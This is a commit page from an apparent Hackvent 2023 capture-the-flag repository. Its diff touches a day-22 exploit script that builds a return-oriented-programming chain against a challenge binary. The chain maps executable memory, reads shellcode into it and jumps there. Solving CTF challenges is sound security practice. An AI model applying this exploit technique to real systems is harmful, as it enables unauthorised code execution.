Roman/Hackvent_2023
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

removed unnecessary ret gadget

Browse Source
This commit is contained in:
Roman Hergenreder 2023-12-22 13:04:00 +01:00
parent d28f9739a4
commit 3d8459f0fd
1 changed files with 2 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
Day 22/exploit.py
View File

@ -88,8 +88,9 @@ def try_char(offset, char):
pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"]) pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"])
pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"]) pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"])
ret = rop.find_gadget(['ret'])
rop.raw(rop.find_gadget(['ret'])) rop.raw(ret)
rop.raw(pop_rcx_ret) rop.raw(pop_rcx_ret)
rop.raw(32) rop.raw(32)
rop.raw(pop_rdi_ret) rop.raw(pop_rdi_ret)
@ -101,9 +102,7 @@ def try_char(offset, char):
else: else:
rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
rop.raw(rop.find_gadget(['ret']))
rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE
rop.read(0, new_segment, 100) rop.read(0, new_segment, 100)
rop.call(new_segment) rop.call(new_segment)